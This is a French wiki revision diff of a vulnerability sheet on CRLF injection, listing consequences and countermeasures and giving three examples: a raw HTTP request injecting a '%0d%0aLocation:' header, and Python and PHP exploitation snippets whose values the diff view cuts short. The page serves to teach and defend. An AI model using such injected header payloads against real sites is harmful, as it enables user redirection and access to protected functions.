cyber:vulnerabilite:crlf
Différences
Ci-dessous, les différences entre deux révisions de la page.
Les deux révisions précédentesRévision précédenteProchaine révision | Révision précédente | ||
cyber:vulnerabilite:crlf [2025/07/03 11:57] – admin | cyber:vulnerabilite:crlf [2025/07/03 12:03] (Version actuelle) – [Exemple 3] admin | ||
---|---|---|---|
Ligne 35: | Ligne 35: | ||
Une exploitation réussie de ce type de vulnérabilité peut permettre : | Une exploitation réussie de ce type de vulnérabilité peut permettre : | ||
- | -* L' | + | |
- | -* La redirection des utilisateurs sur des sites externes ; | + | * La redirection des utilisateurs sur des sites externes ; |
- | -* L' | + | * L' |
- | -* L’accès à des fonctionnalités sensibles. | + | * L’accès à des fonctionnalités sensibles. |
+ | |||
+ | ===== Contres-mesures ===== | ||
- | {{{Contres-mesures}}} | ||
Les contre-mesures suivantes peuvent être mises en œuvre : | Les contre-mesures suivantes peuvent être mises en œuvre : | ||
- | -* Filtrer les caractères CR et LF dans les entrées de données ; | + | |
- | -* S' | + | * S' |
+ | |||
+ | ====== Comment cela fonctionne? | ||
+ | |||
+ | Les scénarii suivants peuvent être joués via l' | ||
+ | * Redirection des visiteurs d'une application ; | ||
+ | * Accès à des ressources protégées. | ||
+ | |||
+ | ===== Exemple 1 ===== | ||
+ | |||
+ | Voici un exemple d' | ||
+ | |||
+ | <code http> | ||
+ | GET / HTTP/1.1 | ||
+ | Host: vulnerable-site.com | ||
+ | |||
+ | %0d%0aLocation: | ||
+ | </ | ||
+ | |||
+ | Dans cet exemple, les caractères < | ||
+ | |||
+ | ===== Exemple 2 ===== | ||
+ | |||
+ | Exploitation de la vulnérabilité CRLF en Python : | ||
+ | |||
+ | <code python> | ||
+ | import requests | ||
+ | |||
+ | url = " | ||
+ | |||
+ | headers = { | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | } | ||
+ | |||
+ | data = " | ||
+ | |||
+ | response = requests.post(url, | ||
+ | </ | ||
+ | |||
+ | Dans cet exemple, nous envoyons une requête POST à l'URL http:// | ||
+ | |||
+ | ===== Exemple 3 ===== | ||
+ | |||
+ | Exploitation de la vulnérabilité CRLF en PHP : | ||
+ | |||
+ | <code php> | ||
+ | <?php | ||
+ | |||
+ | $url = " | ||
+ | |||
+ | $headers = array( | ||
+ | "Host: vulnerable-site.com", | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | ); | ||
+ | |||
+ | $data = " | ||
+ | |||
+ | $options = array( | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | ), | ||
+ | ); | ||
+ | |||
+ | $context | ||
+ | $result = file_get_contents($url, | ||
+ | </ | ||
+ | |||
+ | Dans cet exemple, nous envoyons une requête POST à l'URL http:// | ||
+ | ====== References ====== | ||
+ | URL : | ||
+ | * https:// | ||
+ | * https:// | ||
+ | * https:// | ||
+ | * https:// | ||
+ | * https:// | ||
====== Retour fiches vulnérabilités ====== | ====== Retour fiches vulnérabilités ====== | ||
* [[cyber: | * [[cyber: | ||
cyber/vulnerabilite/crlf.1751536654.txt.gz · Dernière modification : 2025/07/03 11:57 de admin